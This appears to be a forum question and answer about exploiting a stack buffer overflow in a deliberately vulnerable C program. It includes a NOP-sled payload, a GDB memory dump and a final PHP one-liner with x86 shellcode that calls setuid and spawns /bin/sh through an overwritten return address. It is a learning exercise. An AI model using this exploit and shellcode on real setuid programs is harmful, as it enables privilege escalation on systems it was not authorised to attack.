I have a C program to exploit buffer overflow
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int overflow(char *input) {
char buf[256];
strcpy(buf, input);
return 1;
}
int main(int argc, char *argv[]) {
overflow(argv[1]);
printf("meow =^..^=\n");
return 1;
}
I try to fill my stack with 0x90 instructions. For that, I use the following command and inspect with GDB:
./vuln $(python -c 'print ("\x41" * (272 - 96 - 74 - 4) + "\x90" * 96 + "\x44" * 74 + "\x42" * 4)')
0xffffd1cc: 0x41 0x41 0x41 0x41 0x41 0xc2 0x90 0xc2
0xffffd1d4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1dc: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1e4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1ec: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
0xffffd1f4: 0x90 0xc2 0x90 0xc2 0x90 0xc2 0x90 0xc2
As you can see, the stack receives the 0xc2 instruction interspersed with 0x90 (the only one I requested). I believe this comes from some protection, but I'm not sure.
Is this protection? If so, is there any way to bypass it? If not, what would it be?
Thanks for all the help.
The problem was how Python handled hex, I found an alternative by switching to PHP. Here is the implemented code:
./vuln $(php -r 'echo str_repeat("\x41", 179). str_repeat("\x90", 56) . "\x31\xc0\x31\xdb\xb0\xd5\xcd\x80\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" . "\xc0\xd3\xff\xff";')